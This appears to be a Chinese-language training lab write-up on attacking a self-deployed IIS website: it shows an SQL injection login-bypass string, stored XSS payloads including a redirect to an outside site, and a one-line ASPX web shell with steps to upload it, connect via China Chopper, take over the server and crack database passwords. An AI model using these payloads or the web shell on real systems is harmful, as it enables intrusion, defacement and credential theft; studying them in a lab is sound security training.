实训准备
部署一个ISS-web服务
漏洞利用
网站后台绕过
1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。
2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。
3、输入一些特殊字符,如‘’/+-=等,点击登录,观察系统反馈。
4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。
5、进入网站后台管理界面。
通过永真句 ' or 1 or ' 成功进入后台
篡改页面内容
1、在网站前台或后台中寻找能够提交信息的合适位置。
2、提交代码<script>alert("test")</script>,使用另外的主机访问此网站,观察效果。
3、提交代码(代码中的网址可更改):
<script>window.location.href="http://d.mytanwan.com"</script>,观察效果。
一句话木马的使用
1、新建文本文档,将文件后缀修改为aspx,书写内容如下:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
2、在系统中寻找文件上传点。
3、上传之前创建的aspx一句话木马文件。
4、设法获得上传文件在网站目录中的文件名称和路径。
5、利用中国菜刀工具连接一句话木马(密码为pass)。
6、获得目标服务器的操作权限并拿到数据库文件。
7、对数据库中的账号密码进行解密。
利用MD5解密进行解码即可。
总结
1、端口扫描的目的是什么?
检测目标是否开启web服务,从而可以进行漏洞利用。
2、漏洞扫描的目的是什么?
寻找目标网站的缺陷
3、Webshell是什么?
一种恶意脚本。